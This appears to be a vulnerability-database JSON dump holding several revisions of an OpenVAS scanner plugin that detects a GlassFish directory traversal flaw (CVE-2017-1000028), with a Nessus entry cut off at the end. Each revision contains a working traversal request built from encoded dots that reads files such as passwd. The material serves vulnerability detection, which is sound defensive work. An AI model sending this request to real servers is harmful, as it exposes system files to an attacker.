"NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310806848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_glass_fish_dir_trav_vuln.nasl 11702 2018-10-01 07:31:38Z asteins $\n#\n# Oracle Glass Fish Server Directory Traversal Vulnerability\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:glassfish_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806848\");\n script_version(\"$Revision: 11702 $\");\n script_cve_id(\"CVE-2017-1000028\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 09:31:38 +0200 (Mon, 01 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 14:43:03 +0530 (Wed, 27 Jan 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Oracle Glass Fish Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get the content of passwd file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to\n\n - Improper sanitization of parameter 'META-INF' in 'theme.php' file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Oracle Glassfish Server version 4.1.1\n and probably prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the\ndisclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to\na newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/39241\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"GlassFish_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"GlassFish/installed\");\n script_require_ports(\"Services/www\", 4848, 8080, 8181);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae'+\n '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%'+\n 'c0%ae%c0%ae/'+ files[file];\n\n if (http_vuln_check(port:http_port, url:url, pattern:file, check_header: TRUE)) {\n report = report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 9, "lastseen": "2018-10-02T14:29:56"}, {"bulletin": {"id": "OPENVAS:1361412562310806848", "hash": "a7cf2277676e5012de0f8c8d838e13144d7b46dbfcd2ca7d814d6d0a8dc326d7", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Glass Fish Server Directory Traversal Vulnerability", "description": "This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.", "published": "2016-01-27T00:00:00", "modified": "2018-05-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806848", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/39241"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2018-08-30T19:21:37", "history": [], "viewCount": 16, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310806848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_glass_fish_dir_trav_vuln.nasl 9927 2018-05-23 04:13:59Z ckuersteiner $\n#\n# Oracle Glass Fish Server Directory Traversal Vulnerability\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:glassfish_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806848\");\n script_version(\"$Revision: 9927 $\");\n script_cve_id(\"CVE-2017-1000028\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-23 06:13:59 +0200 (Wed, 23 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 14:43:03 +0530 (Wed, 27 Jan 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Oracle Glass Fish Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get the content of passwd file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to\n - Improper sanitization of parameter 'META-INF' in 'theme.php' file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information.\n\n Impact Level: System/Application\");\n\n script_tag(name:\"affected\", value:\"Oracle Glassfish Server version 4.1.1\n and probably prior.\");\n\n script_tag(name:\"solution\" , value:\"No known solution was made available for at least one year since the\ndisclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to\na newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\" , value:\"https://www.exploit-db.com/exploits/39241\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"GlassFish_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"GlassFish/installed\");\n script_require_ports(\"Services/www\", 4848, 8080, 8181);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae'+\n '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%'+\n 'c0%ae%c0%ae/'+ files[file];\n\n if (http_vuln_check(port:http_port, url:url, pattern:file, check_header: TRUE)) {\n report = report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 7, "lastseen": "2018-08-30T19:21:37"}, {"bulletin": {"id": "OPENVAS:1361412562310806848", "hash": "1db041288c6f983b45b22173e54db20a40a5ad10bab4c0c0cfcc82e8a495c496", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Glass Fish Server Directory Traversal Vulnerability", "description": "This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.", "published": "2016-01-27T00:00:00", "modified": "2018-05-23T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806848", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/39241"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2018-05-23T14:48:39", "history": [], "viewCount": 16, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310806848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_glass_fish_dir_trav_vuln.nasl 9927 2018-05-23 04:13:59Z ckuersteiner $\n#\n# Oracle Glass Fish Server Directory Traversal Vulnerability\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:glassfish_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806848\");\n script_version(\"$Revision: 9927 $\");\n script_cve_id(\"CVE-2017-1000028\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-23 06:13:59 +0200 (Wed, 23 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 14:43:03 +0530 (Wed, 27 Jan 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Oracle Glass Fish Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get the content of passwd file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to\n - Improper sanitization of parameter 'META-INF' in 'theme.php' file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information.\n\n Impact Level: System/Application\");\n\n script_tag(name:\"affected\", value:\"Oracle Glassfish Server version 4.1.1\n and probably prior.\");\n\n script_tag(name:\"solution\" , value:\"No known solution was made available for at least one year since the\ndisclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to\na newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\" , value:\"https://www.exploit-db.com/exploits/39241\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"GlassFish_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"GlassFish/installed\");\n script_require_ports(\"Services/www\", 4848, 8080, 8181);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae'+\n '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%'+\n 'c0%ae%c0%ae/'+ files[file];\n\n if (http_vuln_check(port:http_port, url:url, pattern:file, check_header: TRUE)) {\n report = report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2018-05-23T14:48:39"}, {"bulletin": {"id": "OPENVAS:1361412562310806848", "hash": "d089911724fdacc8b04df348343fb5cfe8314f608db90228e9e915ececdfd415", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Glass Fish Server Directory Traversal Vulnerability", "description": "This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.", "published": "2016-01-27T00:00:00", "modified": "2020-05-11T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806848", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/39241"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2020-05-11T21:22:01", "history": [], "viewCount": 156, "enchantments": {"dependencies": {"modified": "2020-05-11T21:22:01", "references": [{"idList": ["EDB-ID:45198", "EDB-ID:45196", "EDB-ID:39241"], "type": "exploitdb"}, {"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2020-05-11T21:22:01", "rev": 2, "value": 6.2, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310806848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Glass Fish Server Directory Traversal Vulnerability\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:glassfish_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806848\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2017-1000028\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-11 12:46:33 +0000 (Mon, 11 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 14:43:03 +0530 (Wed, 27 Jan 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Oracle Glass Fish Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get the content of passwd file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to\n\n - Improper sanitization of parameter 'META-INF' in 'theme.php' file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Oracle Glassfish Server version 4.1.1\n and probably prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the\ndisclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to\na newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/39241\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"GlassFish_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"GlassFish/installed\");\n script_require_ports(\"Services/www\", 4848, 8080, 8181);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae'+\n '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%'+\n 'c0%ae%c0%ae/'+ files[file];\n\n if (http_vuln_check(port:http_port, url:url, pattern:file, check_header: TRUE)) {\n report = http_report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, "differentElements": ["modified", "sourceData"], "edition": 11, "lastseen": "2020-05-11T21:22:01"}, {"bulletin": {"id": "OPENVAS:1361412562310806848", "hash": "d5e1001115ef972c9e3a47e9917cb434c2657cf294c851de10e2ec0e3b31759d", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Glass Fish Server Directory Traversal Vulnerability", "description": "This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.", "published": "2016-01-27T00:00:00", "modified": "2018-10-01T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806848", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/39241"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2019-05-29T18:35:51", "history": [], "viewCount": 156, "enchantments": {"dependencies": {"modified": "2019-05-29T18:35:51", "references": [{"idList": ["EDB-ID:45198", "EDB-ID:45196", "EDB-ID:39241"], "type": "exploitdb"}, {"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2019-05-29T18:35:51", "rev": 2, "value": 6.2, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310806848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_glass_fish_dir_trav_vuln.nasl 11702 2018-10-01 07:31:38Z asteins $\n#\n# Oracle Glass Fish Server Directory Traversal Vulnerability\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:glassfish_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806848\");\n script_version(\"$Revision: 11702 $\");\n script_cve_id(\"CVE-2017-1000028\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 09:31:38 +0200 (Mon, 01 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 14:43:03 +0530 (Wed, 27 Jan 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Oracle Glass Fish Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get the content of passwd file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to\n\n - Improper sanitization of parameter 'META-INF' in 'theme.php' file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Oracle Glassfish Server version 4.1.1\n and probably prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the\ndisclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to\na newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/39241\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"GlassFish_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"GlassFish/installed\");\n script_require_ports(\"Services/www\", 4848, 8080, 8181);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae'+\n '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%'+\n 'c0%ae%c0%ae/'+ files[file];\n\n if (http_vuln_check(port:http_port, url:url, pattern:file, check_header: TRUE)) {\n report = report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, "differentElements": ["modified", "sourceData"], "edition": 10, "lastseen": "2019-05-29T18:35:51"}], "viewCount": 255, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-1000028"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "exploitdb", "idList": ["EDB-ID:45198", "EDB-ID:39241", "EDB-ID:45196"]}, {"type": "nessus", "idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"]}], "modified": "2020-05-12T17:23:31", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2020-05-12T17:23:31", "rev": 2}}, "objectVersion": "1.5", "pluginID": "1361412562310806848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Glass Fish Server Directory Traversal Vulnerability\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:glassfish_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806848\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2017-1000028\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 14:43:03 +0530 (Wed, 27 Jan 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Oracle Glass Fish Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get the content of passwd file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to\n\n - Improper sanitization of parameter 'META-INF' in 'theme.php' file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Oracle Glassfish Server version 4.1.1\n and probably prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the\ndisclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to\na newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/39241\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"GlassFish_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"GlassFish/installed\");\n script_require_ports(\"Services/www\", 4848, 8080, 8181);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae'+\n '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%'+\n 'c0%ae%c0%ae/'+ files[file];\n\n if (http_vuln_check(port:http_port, url:url, pattern:file, check_header: TRUE)) {\n report = http_report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "_object_type": "robots.models.openvas.OpenVASBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openvas.OpenVASBulletin"], "immutableFields": []}], "nessus": [{"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "b1cde8146408d8fec4f61d01851443de", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is affected by an authenticated and unauthenticated path traversal vulnerability. Remote attacker can exploit this issue, via a specially crafted HTTP request, to access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2018-06-14T00:00:00", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?159578ad", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-08-19T12:32:04", "history": [{"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "d1762c95c0c11952ea82e316da20191d974cbe7550478cb9c407923c8e625274", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": 